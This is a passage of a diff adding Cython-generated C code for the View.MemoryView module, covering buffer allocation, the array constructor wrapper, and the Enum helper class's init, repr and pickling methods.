* + * if self.dtype_is_object: # <<<<<<<<<<<<<< + * p = self.data + * for i in range(self.len // self.itemsize): + */ + if (__pyx_v_self->dtype_is_object) { + + /* "View.MemoryView":260 + * + * if self.dtype_is_object: + * p = self.data # <<<<<<<<<<<<<< + * for i in range(self.len // self.itemsize): + * p[i] = Py_None + */ + __pyx_v_p = ((PyObject **)__pyx_v_self->data); + + /* "View.MemoryView":261 + * if self.dtype_is_object: + * p = self.data + * for i in range(self.len // self.itemsize): # <<<<<<<<<<<<<< + * p[i] = Py_None + * Py_INCREF(Py_None) + */ + if (unlikely(__pyx_v_self->itemsize == 0)) { + PyErr_SetString(PyExc_ZeroDivisionError, "integer division or modulo by zero"); + __PYX_ERR(1, 261, __pyx_L1_error) + } + else if (sizeof(Py_ssize_t) == sizeof(long) && (!(((Py_ssize_t)-1) > 0)) && unlikely(__pyx_v_self->itemsize == (Py_ssize_t)-1) && unlikely(__Pyx_UNARY_NEG_WOULD_OVERFLOW(__pyx_v_self->len))) { + PyErr_SetString(PyExc_OverflowError, "value too large to perform division"); + __PYX_ERR(1, 261, __pyx_L1_error) + } + __pyx_t_2 = __Pyx_div_Py_ssize_t(__pyx_v_self->len, __pyx_v_self->itemsize); + __pyx_t_3 = __pyx_t_2; + for (__pyx_t_4 = 0; __pyx_t_4 < __pyx_t_3; __pyx_t_4+=1) { + __pyx_v_i = __pyx_t_4; + + /* "View.MemoryView":262 + * p = self.data + * for i in range(self.len // self.itemsize): + * p[i] = Py_None # <<<<<<<<<<<<<< + * Py_INCREF(Py_None) + * return 0 + */ + (__pyx_v_p[__pyx_v_i]) = Py_None; + + /* "View.MemoryView":263 + * for i in range(self.len // self.itemsize): + * p[i] = Py_None + * Py_INCREF(Py_None) # <<<<<<<<<<<<<< + * return 0 + * + */ + Py_INCREF(Py_None); + } + + /* "View.MemoryView":259 + * raise MemoryError, "unable to allocate array data." + * + * if self.dtype_is_object: # <<<<<<<<<<<<<< + * p = self.data + * for i in range(self.len // self.itemsize): + */ + } + + /* "View.MemoryView":264 + * p[i] = Py_None + * Py_INCREF(Py_None) + * return 0 # <<<<<<<<<<<<<< + * + * + */ + __pyx_r = 0; + goto __pyx_L0; + + /* "View.MemoryView":248 + * + * @cname("__pyx_array_allocate_buffer") + * cdef int _allocate_buffer(array self) except -1: # <<<<<<<<<<<<<< + * + * + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_AddTraceback("View.MemoryView._allocate_buffer", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = -1; + __pyx_L0:; + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "View.MemoryView":268 + * + * @cname("__pyx_array_new") + * cdef array array_cwrapper(tuple shape, Py_ssize_t itemsize, char *format, char *c_mode, char *buf): # <<<<<<<<<<<<<< + * cdef array result + * cdef str mode = "fortran" if c_mode[0] == b'f' else "c" # this often comes from a constant C string. + */ + +static struct __pyx_array_obj *__pyx_array_new(PyObject *__pyx_v_shape, Py_ssize_t __pyx_v_itemsize, char *__pyx_v_format, char *__pyx_v_c_mode, char *__pyx_v_buf) { + struct __pyx_array_obj *__pyx_v_result = 0; + PyObject *__pyx_v_mode = 0; + struct __pyx_array_obj *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + PyObject *__pyx_t_1 = NULL; + int __pyx_t_2; + PyObject *__pyx_t_3 = NULL; + PyObject *__pyx_t_4 = NULL; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("array_cwrapper", 0); + + /* "View.MemoryView":270 + * cdef array array_cwrapper(tuple shape, Py_ssize_t itemsize, char *format, char *c_mode, char *buf): + * cdef array result + * cdef str mode = "fortran" if c_mode[0] == b'f' else "c" # this often comes from a constant C string. # <<<<<<<<<<<<<< + * + * if buf is NULL: + */ + if (((__pyx_v_c_mode[0]) == 'f')) { + __Pyx_INCREF(__pyx_n_s_fortran); + __pyx_t_1 = __pyx_n_s_fortran; + } else { + __Pyx_INCREF(__pyx_n_s_c); + __pyx_t_1 = __pyx_n_s_c; + } + __pyx_v_mode = ((PyObject*)__pyx_t_1); + __pyx_t_1 = 0; + + /* "View.MemoryView":272 + * cdef str mode = "fortran" if c_mode[0] == b'f' else "c" # this often comes from a constant C string. + * + * if buf is NULL: # <<<<<<<<<<<<<< + * result = array.__new__(array, shape, itemsize, format, mode) + * else: + */ + __pyx_t_2 = (__pyx_v_buf == NULL); + if (__pyx_t_2) { + + /* "View.MemoryView":273 + * + * if buf is NULL: + * result = array.__new__(array, shape, itemsize, format, mode) # <<<<<<<<<<<<<< + * else: + * result = array.__new__(array, shape, itemsize, format, mode, allocate_buffer=False) + */ + __pyx_t_1 = PyInt_FromSsize_t(__pyx_v_itemsize); if (unlikely(!__pyx_t_1)) __PYX_ERR(1, 273, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_t_3 = __Pyx_PyBytes_FromString(__pyx_v_format); if (unlikely(!__pyx_t_3)) __PYX_ERR(1, 273, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_3); + __pyx_t_4 = PyTuple_New(4); if (unlikely(!__pyx_t_4)) __PYX_ERR(1, 273, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_4); + __Pyx_INCREF(__pyx_v_shape); + __Pyx_GIVEREF(__pyx_v_shape); + PyTuple_SET_ITEM(__pyx_t_4, 0, __pyx_v_shape); + __Pyx_GIVEREF(__pyx_t_1); + PyTuple_SET_ITEM(__pyx_t_4, 1, __pyx_t_1); + __Pyx_GIVEREF(__pyx_t_3); + PyTuple_SET_ITEM(__pyx_t_4, 2, __pyx_t_3); + __Pyx_INCREF(__pyx_v_mode); + __Pyx_GIVEREF(__pyx_v_mode); + PyTuple_SET_ITEM(__pyx_t_4, 3, __pyx_v_mode); + __pyx_t_1 = 0; + __pyx_t_3 = 0; + __pyx_t_3 = ((PyObject *)__pyx_tp_new_array(((PyTypeObject *)__pyx_array_type), __pyx_t_4, NULL)); if (unlikely(!__pyx_t_3)) __PYX_ERR(1, 273, __pyx_L1_error) + __Pyx_GOTREF((PyObject *)__pyx_t_3); + __Pyx_DECREF(__pyx_t_4); __pyx_t_4 = 0; + __pyx_v_result = ((struct __pyx_array_obj *)__pyx_t_3); + __pyx_t_3 = 0; + + /* "View.MemoryView":272 + * cdef str mode = "fortran" if c_mode[0] == b'f' else "c" # this often comes from a constant C string. + * + * if buf is NULL: # <<<<<<<<<<<<<< + * result = array.__new__(array, shape, itemsize, format, mode) + * else: + */ + goto __pyx_L3; + } + + /* "View.MemoryView":275 + * result = array.__new__(array, shape, itemsize, format, mode) + * else: + * result = array.__new__(array, shape, itemsize, format, mode, allocate_buffer=False) # <<<<<<<<<<<<<< + * result.data = buf + * + */ + /*else*/ { + __pyx_t_3 = PyInt_FromSsize_t(__pyx_v_itemsize); if (unlikely(!__pyx_t_3)) __PYX_ERR(1, 275, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_3); + __pyx_t_4 = __Pyx_PyBytes_FromString(__pyx_v_format); if (unlikely(!__pyx_t_4)) __PYX_ERR(1, 275, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_4); + __pyx_t_1 = PyTuple_New(4); if (unlikely(!__pyx_t_1)) __PYX_ERR(1, 275, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __Pyx_INCREF(__pyx_v_shape); + __Pyx_GIVEREF(__pyx_v_shape); + PyTuple_SET_ITEM(__pyx_t_1, 0, __pyx_v_shape); + __Pyx_GIVEREF(__pyx_t_3); + PyTuple_SET_ITEM(__pyx_t_1, 1, __pyx_t_3); + __Pyx_GIVEREF(__pyx_t_4); + PyTuple_SET_ITEM(__pyx_t_1, 2, __pyx_t_4); + __Pyx_INCREF(__pyx_v_mode); + __Pyx_GIVEREF(__pyx_v_mode); + PyTuple_SET_ITEM(__pyx_t_1, 3, __pyx_v_mode); + __pyx_t_3 = 0; + __pyx_t_4 = 0; + __pyx_t_4 = __Pyx_PyDict_NewPresized(1); if (unlikely(!__pyx_t_4)) __PYX_ERR(1, 275, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_4); + if (PyDict_SetItem(__pyx_t_4, __pyx_n_s_allocate_buffer, Py_False) < 0) __PYX_ERR(1, 275, __pyx_L1_error) + __pyx_t_3 = ((PyObject *)__pyx_tp_new_array(((PyTypeObject *)__pyx_array_type), __pyx_t_1, __pyx_t_4)); if (unlikely(!__pyx_t_3)) __PYX_ERR(1, 275, __pyx_L1_error) + __Pyx_GOTREF((PyObject *)__pyx_t_3); + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + __Pyx_DECREF(__pyx_t_4); __pyx_t_4 = 0; + __pyx_v_result = ((struct __pyx_array_obj *)__pyx_t_3); + __pyx_t_3 = 0; + + /* "View.MemoryView":276 + * else: + * result = array.__new__(array, shape, itemsize, format, mode, allocate_buffer=False) + * result.data = buf # <<<<<<<<<<<<<< + * + * return result + */ + __pyx_v_result->data = __pyx_v_buf; + } + __pyx_L3:; + + /* "View.MemoryView":278 + * result.data = buf + * + * return result # <<<<<<<<<<<<<< + * + * + */ + __Pyx_XDECREF((PyObject *)__pyx_r); + __Pyx_INCREF((PyObject *)__pyx_v_result); + __pyx_r = __pyx_v_result; + goto __pyx_L0; + + /* "View.MemoryView":268 + * + * @cname("__pyx_array_new") + * cdef array array_cwrapper(tuple shape, Py_ssize_t itemsize, char *format, char *c_mode, char *buf): # <<<<<<<<<<<<<< + * cdef array result + * cdef str mode = "fortran" if c_mode[0] == b'f' else "c" # this often comes from a constant C string. + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_1); + __Pyx_XDECREF(__pyx_t_3); + __Pyx_XDECREF(__pyx_t_4); + __Pyx_AddTraceback("View.MemoryView.array_cwrapper", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = 0; + __pyx_L0:; + __Pyx_XDECREF((PyObject *)__pyx_v_result); + __Pyx_XDECREF(__pyx_v_mode); + __Pyx_XGIVEREF((PyObject *)__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "View.MemoryView":304 + * cdef class Enum(object): + * cdef object name + * def __init__(self, name): # <<<<<<<<<<<<<< + * self.name = name + * def __repr__(self): + */ + +/* Python wrapper */ +static int __pyx_MemviewEnum___init__(PyObject *__pyx_v_self, PyObject *__pyx_args, PyObject *__pyx_kwds); /*proto*/ +static int __pyx_MemviewEnum___init__(PyObject *__pyx_v_self, PyObject *__pyx_args, PyObject *__pyx_kwds) { + PyObject *__pyx_v_name = 0; + CYTHON_UNUSED const Py_ssize_t __pyx_nargs = PyTuple_GET_SIZE(__pyx_args); + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_VARARGS(__pyx_args, __pyx_nargs); + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + int __pyx_r; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__init__ (wrapper)", 0); + { + PyObject **__pyx_pyargnames[] = {&__pyx_n_s_name,0}; + PyObject* values[1] = {0}; + if (__pyx_kwds) { + Py_ssize_t kw_args; + switch (__pyx_nargs) { + case 1: values[0] = __Pyx_Arg_VARARGS(__pyx_args, 0); + CYTHON_FALLTHROUGH; + case 0: break; + default: goto __pyx_L5_argtuple_error; + } + kw_args = __Pyx_NumKwargs_VARARGS(__pyx_kwds); + switch (__pyx_nargs) { + case 0: + if (likely((values[0] = __Pyx_GetKwValue_VARARGS(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_name)) != 0)) kw_args--; + else if (unlikely(PyErr_Occurred())) __PYX_ERR(1, 304, __pyx_L3_error) + else goto __pyx_L5_argtuple_error; + } + if (unlikely(kw_args > 0)) { + const Py_ssize_t kwd_pos_args = __pyx_nargs; + if (unlikely(__Pyx_ParseOptionalKeywords(__pyx_kwds, __pyx_kwvalues, __pyx_pyargnames, 0, values + 0, kwd_pos_args, "__init__") < 0)) __PYX_ERR(1, 304, __pyx_L3_error) + } + } else if (unlikely(__pyx_nargs != 1)) { + goto __pyx_L5_argtuple_error; + } else { + values[0] = __Pyx_Arg_VARARGS(__pyx_args, 0); + } + __pyx_v_name = values[0]; + } + goto __pyx_L4_argument_unpacking_done; + __pyx_L5_argtuple_error:; + __Pyx_RaiseArgtupleInvalid("__init__", 1, 1, 1, __pyx_nargs); __PYX_ERR(1, 304, __pyx_L3_error) + __pyx_L3_error:; + __Pyx_AddTraceback("View.MemoryView.Enum.__init__", __pyx_clineno, __pyx_lineno, __pyx_filename); + __Pyx_RefNannyFinishContext(); + return -1; + __pyx_L4_argument_unpacking_done:; + __pyx_r = __pyx_MemviewEnum___pyx_pf_15View_dot_MemoryView_4Enum___init__(((struct __pyx_MemviewEnum_obj *)__pyx_v_self), __pyx_v_name); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static int __pyx_MemviewEnum___pyx_pf_15View_dot_MemoryView_4Enum___init__(struct __pyx_MemviewEnum_obj *__pyx_v_self, PyObject *__pyx_v_name) { + int __pyx_r; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__init__", 0); + + /* "View.MemoryView":305 + * cdef object name + * def __init__(self, name): + * self.name = name # <<<<<<<<<<<<<< + * def __repr__(self): + * return self.name + */ + __Pyx_INCREF(__pyx_v_name); + __Pyx_GIVEREF(__pyx_v_name); + __Pyx_GOTREF(__pyx_v_self->name); + __Pyx_DECREF(__pyx_v_self->name); + __pyx_v_self->name = __pyx_v_name; + + /* "View.MemoryView":304 + * cdef class Enum(object): + * cdef object name + * def __init__(self, name): # <<<<<<<<<<<<<< + * self.name = name + * def __repr__(self): + */ + + /* function exit code */ + __pyx_r = 0; + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "View.MemoryView":306 + * def __init__(self, name): + * self.name = name + * def __repr__(self): # <<<<<<<<<<<<<< + * return self.name + * + */ + +/* Python wrapper */ +static PyObject *__pyx_MemviewEnum___repr__(PyObject *__pyx_v_self); /*proto*/ +static PyObject *__pyx_MemviewEnum___repr__(PyObject *__pyx_v_self) { + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_VARARGS(__pyx_args, __pyx_nargs); + PyObject *__pyx_r = 0; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__repr__ (wrapper)", 0); + __pyx_r = __pyx_MemviewEnum___pyx_pf_15View_dot_MemoryView_4Enum_2__repr__(((struct __pyx_MemviewEnum_obj *)__pyx_v_self)); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static PyObject *__pyx_MemviewEnum___pyx_pf_15View_dot_MemoryView_4Enum_2__repr__(struct __pyx_MemviewEnum_obj *__pyx_v_self) { + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__repr__", 0); + + /* "View.MemoryView":307 + * self.name = name + * def __repr__(self): + * return self.name # <<<<<<<<<<<<<< + * + * cdef generic = Enum("") + */ + __Pyx_XDECREF(__pyx_r); + __Pyx_INCREF(__pyx_v_self->name); + __pyx_r = __pyx_v_self->name; + goto __pyx_L0; + + /* "View.MemoryView":306 + * def __init__(self, name): + * self.name = name + * def __repr__(self): # <<<<<<<<<<<<<< + * return self.name + * + */ + + /* function exit code */ + __pyx_L0:; + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "(tree fragment)":1 + * def __reduce_cython__(self): # <<<<<<<<<<<<<< + * cdef tuple state + * cdef object _dict + */ + +/* Python wrapper */ +static PyObject *__pyx_pw___pyx_MemviewEnum_1__reduce_cython__(PyObject *__pyx_v_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +); /*proto*/ +static PyObject *__pyx_pw___pyx_MemviewEnum_1__reduce_cython__(PyObject *__pyx_v_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +) { + #if !CYTHON_METH_FASTCALL + CYTHON_UNUSED const Py_ssize_t __pyx_nargs = PyTuple_GET_SIZE(__pyx_args); + #endif + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_FASTCALL(__pyx_args, __pyx_nargs); + PyObject *__pyx_r = 0; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__reduce_cython__ (wrapper)", 0); + if (unlikely(__pyx_nargs > 0)) { + __Pyx_RaiseArgtupleInvalid("__reduce_cython__", 1, 0, 0, __pyx_nargs); return NULL;} + if (unlikely(__pyx_kwds) && __Pyx_NumKwargs_FASTCALL(__pyx_kwds) && unlikely(!__Pyx_CheckKeywordStrings(__pyx_kwds, "__reduce_cython__", 0))) return NULL; + __pyx_r = __pyx_pf___pyx_MemviewEnum___reduce_cython__(((struct __pyx_MemviewEnum_obj *)__pyx_v_self)); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static PyObject *__pyx_pf___pyx_MemviewEnum___reduce_cython__(struct __pyx_MemviewEnum_obj *__pyx_v_self) { + PyObject *__pyx_v_state = 0; + PyObject *__pyx_v__dict = 0; + int __pyx_v_use_setstate; + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + PyObject *__pyx_t_1 = NULL; + int __pyx_t_2; + PyObject *__pyx_t_3 = NULL; + PyObject *__pyx_t_4 = NULL; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("__reduce_cython__", 0); + + /* "(tree fragment)":5 + * cdef object _dict + * cdef bint use_setstate + * state = (self.name,) # <<<<<<<<<<<<<< + * _dict = getattr(self, '__dict__', None) + * if _dict is not None: + */ + __pyx_t_1 = PyTuple_New(1); if (unlikely(!__pyx_t_1)) __PYX_ERR(1, 5, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __Pyx_INCREF(__pyx_v_self->name); + __Pyx_GIVEREF(__pyx_v_self->name); + PyTuple_SET_ITEM(__pyx_t_1, 0, __pyx_v_self->name); + __pyx_v_state = ((PyObject*)__pyx_t_1); + __pyx_t_1 = 0; + + /* "(tree fragment)":6 + * cdef bint use_setstate + * state = (self.name,) + * _dict = getattr(self, '__dict__', None) # <<<<<<<<<<<<<< + * if _dict is not None: + * state += (_dict,) + */ + __pyx_t_1 = __Pyx_GetAttr3(((PyObject *)__pyx_v_self), __pyx_n_s_dict, Py_None); if (unlikely(!__pyx_t_1)) __PYX_ERR(1, 6, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_v__dict = __pyx_t_1; + __pyx_t_1 = 0; + + /* "(tree fragment)":7 + * state = (self.name,) + * _dict = getattr(self, '__dict__', None) + * if _dict is not None: # <<<<<<<<<<<<<< + * state += (_dict,) + * use_setstate = True + */ + __pyx_t_2 = (__pyx_v__dict != Py_None); + if (__pyx_t_2) { + + /* "(tree fragment)":8 + * _dict = getattr(self, '__dict__', None) + * if _dict is not None: + * state += (_dict,) # <<<<<<<<<<<<<< + * use_setstate = True + * else: + */ + __pyx_t_1 = PyTuple_New(1); if (unlikely(!__pyx_t_1)) __PYX_ERR(1, 8, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __Pyx_INCREF(__pyx_v__dict); + __Pyx_GIVEREF(__pyx_v__dict); + PyTuple_SET_ITEM(__pyx_t_1, 0, __pyx_v__dict); + __pyx_t_3 = PyNumber_InPlaceAdd(__pyx_v_state, __pyx_t_1); if (unlikely(!__pyx_t_3)) __PYX_ERR(1, 8, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_3); + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + __Pyx_DECREF_SET(__pyx_v_state, ((PyObject*)__pyx_t_3)); + __pyx_t_3 = 0; + + /* "(tree fragment)":9 + * if _dict is not None: + * state += (_dict,) + * use_setstate = True # <<<<<<<<<<<<<< + * else: + * use_setstate = self.name is not None + */ + __pyx_v_use_setstate = 1; + + /* "(tree fragment)":7 + * state = (self.name,) + * _dict = getattr(self, '__dict__', None) + * if _dict is not None: # <<<<<<<<<<<<<< + * state += (_dict,) + * use_setstate = True + */ + goto __pyx_L3; + } + + /* "(tree fragment)":11 + * use_setstate = True + * else: + * use_setstate = self.name is not None # <<<<<<<<<<<<<< + * if use_setstate: + * return __pyx_unpickle_Enum, (type(self), 0x82a3537, None), state + */ + /*else*/ { + __pyx_t_2 = (__pyx_v_self->name != Py_None); + __pyx_v_use_setstate = __pyx_t_2; + } + __pyx_L3:; + + /* "(tree fragment)":12 + * else: + * use_setstate = self.name is not None + * if use_setstate: # <<<<<<<<<<<<<< + * return __pyx_unpickle_Enum, (type(self), 0x82a3537, None), state + * else: + */ + if (__pyx_v_use_setstate) { + + /* "(tree fragment)":13 + * use_setstate = self.name is not None + * if use_setstate: + * return __pyx_unpickle_Enum, (type(self), 0x82a3537, None), state # <<<<<<<<<<<<<< + * else: + * return __pyx_unpickle_Enum, (type(self), 0x82a3537, state) + */ + __Pyx_XDECREF(__pyx_r); + __Pyx_GetModuleGlobalName(__pyx_t_3, __pyx_n_s_pyx_unpickle_Enum); if (unlikely(!__pyx_t_3)) __PYX_ERR(1, 13, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_3); + __pyx_t_1 = PyTuple_New(3); if (unlikely(!__pyx_t_1)) __PYX_ERR(1, 13, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __Pyx_INCREF(((PyObject *)Py_TYPE(((PyObject *)__pyx_v_self)))); + __Pyx_GIVEREF(((PyObject *)Py_TYPE(((PyObject *)__pyx_v_self)))); + PyTuple_SET_ITEM(__pyx_t_1, 0, ((PyObject *)Py_TYPE(((PyObject *)__pyx_v_self)))); + __Pyx_INCREF(__pyx_int_136983863); + __Pyx_GIVEREF(__pyx_int_136983863); + PyTuple_SET_ITEM(__pyx_t_1, 1, __pyx_int_136983863); + __Pyx_INCREF(Py_None); + __Pyx_GIVEREF(Py_None); + PyTuple_SET_ITEM(__pyx_t_1, 2, Py_None); + __pyx_t_4 = PyTuple_New(3); if (unlikely(!__pyx_t_4)) __PYX_ERR(1, 13, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_4); + __Pyx_GIVEREF(__pyx_t_3); + PyTuple_SET_ITEM(__pyx_t_4, 0, __pyx_t_3); + __Pyx_GIVEREF(__pyx_t_1); + PyTuple_SET_ITEM(__pyx_t_4, 1, __pyx_t_1); + __Pyx_INCREF(__pyx_v_state); + __Pyx_GIVEREF(__pyx_v_state); + PyTuple_SET_ITEM(__pyx_t_4, 2, __pyx_v_state); + __pyx_t_3 = 0; + __pyx_t_1 = 0; + __pyx_r = __pyx_t_4; + __pyx_t_4 = 0; + goto __pyx_L0; + + /* "(tree fragment)":12 + * else: + * use_setstate = self.name is not None + * if use_setstate: # <<<<<<<<<<<<<< + * return __pyx_unpickle_Enum, (type(self), 0x82a3537, None), state + * else: + */ + } + + /* "(tree fragment)":15 + * return __pyx_unpickle_Enum, (type(self), 0x82a3537, None), state + * else: + * return __pyx_unpickle_Enum, (type(self), 0x82a3537, state) # <<<<<<<<<<<<<< + * def __setstate_cython__(self, __pyx_state): + * __pyx_unpickle_Enum__set_state(self, __pyx_state) + */ + /*else*/ { + __Pyx_XDECREF(__pyx_r); + __Pyx_GetModuleGlobalName(__pyx_t_4, __pyx_n_s_pyx_unpickle_Enum); if (unlikely(!__pyx_t_4)) __PYX_ERR(1, 15, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_4); + __pyx_t_1 = PyTuple_New(3); if (unlikely(!__pyx_t_1)) __PYX_ERR(1, 15, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __Pyx_INCREF(((PyObject *)Py_TYPE(((PyObject *)__pyx_v_self)))); + __Pyx_GIVEREF(((PyObject *)Py_TYPE(((PyObject *)__pyx_v_self)))); + PyTuple_SET_ITEM(__pyx_t_1, 0, ((PyObject *)Py_TYPE(((PyObject *)__pyx_v_self)))); + __Pyx_INCREF(__pyx_int_136983863); + __Pyx_GIVEREF(__pyx_int_136983863); + PyTuple_SET_ITEM(__pyx_t_1, 1, __pyx_int_136983863); + __Pyx_INCREF(__pyx_v_state); + __Pyx_GIVEREF(__pyx_v_state); + PyTuple_SET_ITEM(__pyx_t_1, 2, __pyx_v_state); + __pyx_t_3 = PyTuple_New(2); if (unlikely(!__pyx_t_3)) __PYX_ERR(1, 15, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_3); + __Pyx_GIVEREF(__pyx_t_4); + PyTuple_SET_ITEM(__pyx_t_3, 0, __pyx_t_4); + __Pyx_GIVEREF(__pyx_t_1); + PyTuple_SET_ITEM(__pyx_t_3, 1, __pyx_t_1); + __pyx_t_4 = 0; + __pyx_t_1 = 0; + __pyx_r = __pyx_t_3; + __pyx_t_3 = 0; + goto __pyx_L0; + } + + /* "(tree fragment)":1 + * def __reduce_cython__(self): # <<<<<<<<<<<<<< + * cdef tuple state + * cdef object _dict + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_1); + __Pyx_XDECREF(__pyx_t_3); + __Pyx_XDECREF(__pyx_t_4); + __Pyx_AddTraceback("View.MemoryView.Enum.__reduce_cython__", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = NULL; + __pyx_L0:; + __Pyx_XDECREF(__pyx_v_state); + __Pyx_XDECREF(__pyx_v__dict); + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "(tree fragment)":16 + * else: + * return __pyx_unpickle_Enum, (type(self), 0x82a3537, state) + * def __setstate_cython__(self, __pyx_state): # <<<<<<<<<<<<<< + * __pyx_unpickle_Enum__set_state(self, __pyx_state) + */ + +/* Python wrapper */ +static PyObject *__pyx_pw___pyx_MemviewEnum_3__setstate_cython__(PyObject *__pyx_v_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +); /*proto*/ +static PyObject *__pyx_pw___pyx_MemviewEnum_3__setstate_cython__(PyObject *__pyx_v_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +) { + PyObject *__pyx_v___pyx_state = 0; + #if !CYTHON_METH_FASTCALL + CYTHON_UNUSED const Py_ssize_t __pyx_nargs = PyTuple_GET_SIZE(__pyx_args); + #endif + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_FASTCALL(__pyx_args, __pyx_nargs); + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + PyObject *__pyx_r = 0; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__setstate_cython__ (wrapper)", 0); + { + PyObject **__pyx_pyargnames[] = {&__pyx_n_s_pyx_state,0}; + PyObject* values[1] = {0}; + if (__pyx_kwds) { + Py_ssize_t kw_args; + switch (__pyx_nargs) { + case 1: values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); + CYTHON_FALLTHROUGH; + case 0: break; + default: goto __pyx_L5_argtuple_error; + } + kw_args = __Pyx_NumKwargs_FASTCALL(__pyx_kwds); + switch (__pyx_nargs) { + case 0: + if (likely((values[0] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_pyx_state)) != 0)) kw_args--; + else if (unlikely(PyErr_Occurred())) __PYX_ERR(1, 16, __pyx_L3_error) + else goto __pyx_L5_argtuple_error; + } + if (unlikely(kw_args > 0)) { + const Py_ssize_t kwd_pos_args = __pyx_nargs; + if (unlikely(__Pyx_ParseOptionalKeywords(__pyx_kwds, __pyx_kwvalues, __pyx_pyargnames, 0, values + 0, kwd_pos_args, "__setstate_cython__") < 0)) __PYX_ERR(1, 16, __pyx_L3_error) + } + } else if (unlikely(__pyx_nargs != 1)) { + goto __pyx_L5_argtuple_error; + } else { + values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); + } + __pyx_v___pyx_state = values[0]; + } + goto __pyx_L4_argument_unpacking_done; + __pyx_L5_argtuple_error:; + __Pyx_RaiseArgtupleInvalid("__setstate_cython__", 1, 1, 1, __pyx_nargs); __PYX_ERR(1, 16, __pyx_L3_error) + __pyx_L3_error:; + __Pyx_AddTraceback("View.MemoryView.Enum.__setstate_cython__", __pyx_clineno, __pyx_lineno, __pyx_filename); + __Pyx_RefNannyFinishContext(); + return NULL; + __pyx_L4_argument_unpacking_done:; + __pyx_r = __pyx_pf___pyx_MemviewEnum_2__setstate_cython__(((struct __pyx_MemviewEnum_obj *)__pyx_v_self), __pyx_v___pyx_state); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static PyObject *__pyx_pf___pyx_MemviewEnum_2__setstate_cython__(struct __pyx_MemviewEnum_obj *__pyx_v_self, PyObject *__pyx_v___pyx_state) { + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + PyObject *__pyx_t_1 = NULL; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("__setstate_cython__", 0); + + /* "(tree fragment)":17 + * return __pyx_unpickle_Enum, (type(self), 0x82a3537, state) + * def __setstate_cython__(self, 